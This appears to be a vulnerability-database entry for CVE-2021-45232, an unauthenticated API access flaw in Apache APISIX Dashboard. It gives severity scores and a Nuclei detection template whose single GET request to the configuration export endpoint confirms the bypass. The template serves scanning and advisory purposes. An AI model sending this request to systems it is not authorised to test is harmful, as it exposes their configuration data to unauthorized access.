9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.6 High
AI Score
Confidence
High
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.972 High
EPSS
Percentile
99.8%
In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework droplet
on the basis of framework gin.' While all APIs and authentication middleware are developed based on framework
droplet, some API directly use the interface of framework
gin` thus bypassing their authentication.
id: CVE-2021-45232
info:
name: Apache APISIX Dashboard <2.10.1 - API Unauthorized Access
author: Mr-xn
severity: critical
description: In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin.' While all APIs and authentication middleware are developed based on framework `droplet`, some API directly use the interface of framework `gin` thus bypassing their authentication.
impact: |
An attacker can gain unauthorized access to the API, potentially leading to data breaches or unauthorized actions.
remediation: Upgrade to release 2.10.1 or later. Or, change the default username and password, and restrict the source IP to access the Apache APISIX Dashboard.
reference:
- https://apisix.apache.org/zh/blog/2021/12/28/dashboard-cve-2021-45232/
- https://github.com/pingpongcult/CVE-2021-45232
- https://github.com/advisories/GHSA-wcxq-f256-53xp
- https://twitter.com/403Timeout/status/1475715079173976066
- https://github.com/wuppp/cve-2021-45232-exp
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-45232
cwe-id: CWE-306
epss-score: 0.97202
epss-percentile: 0.99785
cpe: cpe:2.3:a:apache:apisix_dashboard:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: apache
product: apisix_dashboard
tags: cve2021,cve,apache,unauth,apisix
http:
- method: GET
path:
- "{{RootURL}}/apisix/admin/migrate/export"
matchers-condition: and
matchers:
- type: word
words:
- '"Consumers":'
- type: status
status:
- 200
# digest: 4a0a00473045022014b3e39d19a975739d881f2d173c53050a43a15247eef092bc780b944e70f735022100c14dab355b7a0757b760b95b2a0499f2bc8027dacbc8d90a7416268f7b9337a7:922c64590222798bb761d5b6d8e72950
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.6 High
AI Score
Confidence
High
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.972 High
EPSS
Percentile
99.8%